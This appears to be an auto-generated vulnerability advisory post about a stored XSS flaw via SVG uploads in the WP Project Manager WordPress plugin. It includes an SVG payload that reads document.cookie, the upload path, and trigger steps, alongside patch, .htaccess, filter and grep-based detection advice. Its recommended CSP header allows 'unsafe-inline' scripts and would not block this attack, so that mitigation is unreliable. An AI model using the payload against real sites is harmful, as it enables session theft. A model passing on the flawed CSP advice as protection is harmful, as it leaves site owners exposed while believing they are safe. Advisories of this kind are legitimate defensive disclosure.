The WP Project Manager plugin (≤ v2.6.22) fails to sanitize SVG file uploads, allowing authenticated attackers (Author+) to inject malicious scripts. When uploaded, the SVG’s embedded JavaScript executes upon victim access, enabling session hijacking, defacement, or malware delivery. The flaw stems from improper validation of the `file_upload` handler, which trusts SVG content-type headers without parsing the actual markup.
DailyCVE Form:
Platform: WordPress
Version: ≤ 2.6.22
Vulnerability: Stored XSS
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit:
1. Craft malicious SVG:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
2. Upload via `/wp-admin/admin.php?page=project-manager-file-upload`.
3. Trigger payload when admin views the file.
Protection:
1. Patch to v2.6.23+.
2. Add `.htaccess` rule to disable SVG execution:
<FilesMatch "\.svg$"> ForceType text/plain </FilesMatch>
3. WordPress filter:
add_filter('upload_mimes', function($mimes) {
unset($mimes['svg']);
return $mimes;
});
Detection:
Scan for suspicious SVG uploads:
grep -r "onload=" /var/www/html/wp-content/uploads/
Mitigation:
- Restrict file uploads to Editors+.
- Implement CSP headers:
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
